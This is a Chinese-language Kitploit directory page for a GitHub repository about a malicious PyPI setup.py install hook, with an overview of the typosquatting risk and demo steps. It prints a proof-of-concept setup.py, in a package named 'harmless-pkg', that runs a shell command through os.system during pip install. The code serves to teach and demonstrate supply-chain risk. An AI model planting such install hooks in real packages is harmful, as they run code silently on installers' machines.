Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — 演示恶意 Python 包如何通过 setup.py 在 pip install 期间执行任意命令,凸显 PyPI 供应链及 typosquatting(域名抢注)风险。 | Kitploit
工具/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
漏洞利用供应链安全学习与教育Payload 开发对抗性攻击
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

演示恶意 Python 包如何通过 setup.py 在 pip install 期间执行任意命令,凸显 PyPI 供应链及 typosquatting(域名抢注)风险。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
16天前尚未审核

CVE-2026-21016 – 恶意 PyPI 包安装钩子(setup.py 执行)

程序代码(Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – 恶意 PyPI 包安装钩子(setup.py)

Severity: Critical

概述

PyPI 包可以在其 setup.py 中包含任意代码,这些代码会在 pip install 期间执行。攻击者可以发布一个名称与流行包相似的包(typosquatting,拼写仿冒),安装时有效载荷将以用户权限运行,从而导致远程代码执行。

漏洞详情

  • 类型: 供应链攻击 / 代码执行
  • 影响: 系统沦陷、凭据窃取。
  • 根本原因: Pip 在无沙箱的情况下执行 setup.py,使包拥有完全访问权限。

漏洞利用演示

  1. 使用给定的 setup.py 创建恶意包目录。
  2. 在本地安装它:
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. 检查输出:
    root@kitploit:~
    cat /tmp/pwned_by_package
    

id 命令已被执行。

下载工具